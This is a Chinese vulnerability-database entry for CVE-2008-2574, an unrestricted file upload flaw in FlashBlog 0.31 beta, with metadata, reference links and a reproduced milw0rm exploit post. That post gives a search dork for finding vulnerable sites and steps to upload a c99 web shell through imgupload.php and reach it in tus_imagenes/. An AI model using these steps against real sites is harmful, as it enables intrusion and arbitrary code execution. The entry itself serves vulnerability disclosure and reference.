flashblog admin/Editor/imgupload.php 未限制文件上传漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115343 漏洞类型 输入验证
发布时间 2008-06-03 更新时间 2008-06-06
CVE编号 CVE-2008-2574 CNNVD-ID CNNVD-200806-121
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/5728
https://www.securityfocus.com/bid/84988
https://cxsecurity.com/issue/WLB-2008050025
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200806-121
|漏洞详情
FlashBlog0.31测试第二版中的admin/Editor/imgupload.php存在未限制文件上传漏洞。远程攻击者可以通过先上传一个.php文件,然后借助对tus_imagenes/中的文件的一个直接请求访问它,从而实现任意代码执行。
|漏洞EXP
FlashBlog beta0.31 Remote File Upload Vulnerability

# Author : ilker kandemir a.k.a MEFISTO  

# Dork : inurl:flashblog.html  or  inurl:/flashblog/

# Website : www.dumenci.net, www.coderx.org

http://[site.com]/admin/Editor/imgupload.php ==>>> upload your c99 shell

http://[site.com]/tus_imagenes/c99.php ==>>> your address

Tnx: Dumenci, Damar, Cr@zy_king, Str0ke and all my friendz

# milw0rm.com [2008-06-03]
|受影响的产品
FlashBlog FlashBlog 0.31 BETA
|参考资料

来源:XF
名称:flashblog-imgupload-file-upload(42820)
链接:http://xforce.iss.net/xforce/xfdb/42820
来源:BUGTRAQ
名称:20080529FlashBlogRemoteFileUploadVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/492738/100/0/threaded
来源:MILW0RM
名称:5728
链接:http://www.milw0rm.com/exploits/5728
来源:MISC
名称:http://www.flashblog.org
链接:http://www.flashblog.org
来源:MISC
链接:http://www.dumenci.net/web-action/flashblog-beta0.31-remote-file-upload-vulnerability.html
来源:SREASON
名称:3928
链接:http://securityreason.com/securityalert/3928